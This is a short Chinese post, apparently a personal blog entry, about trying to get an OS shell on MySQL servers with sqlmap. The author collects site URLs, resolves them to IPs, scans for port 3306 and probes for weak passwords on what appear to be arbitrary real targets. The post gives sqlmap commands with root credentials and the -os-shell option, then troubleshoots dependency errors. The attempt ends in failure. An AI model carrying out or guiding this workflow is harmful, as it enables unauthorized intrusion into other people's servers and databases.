sqlmap拿3306的shell

前提

首先采集网站url,然后通过url域名转化为ip，再通过端口扫描探测出想要的端口，比如3306

然后进行弱口令探测

然后我探测出某弱口令

拿shell

登上服务器，首先安装sqlmap

wget https://github.com/sqlmapproject/sqlmap/tarball/master

tar -zxvf master
cd sqlmapproject-sqlmap-de63238/

成功

python2 sqlmap.py -d "mysql://root:[email protected]:3306/mysql" -os-shell

提示报错

image.png

需要“python pymysql”第三方库

python2 -m pip install pymysql

报错

换了一台服务器 python2.6.6

python sqlmap.py -d "mysql://root:[email protected]:3306/mysql" -os-shell

先安装pip

curl https://bootstrap.pypa.io/2.6/get-pip.py -o get-pip.py

python get-pip.py

pip install pymysql

再次运行 还是不行

image.png

网上参考到直接github下载组件

组件

我直接本机安装 然后可以运行了 不过把MySQL服务判断为了oracle

orcale

....结局利用sqlmap拿shell失败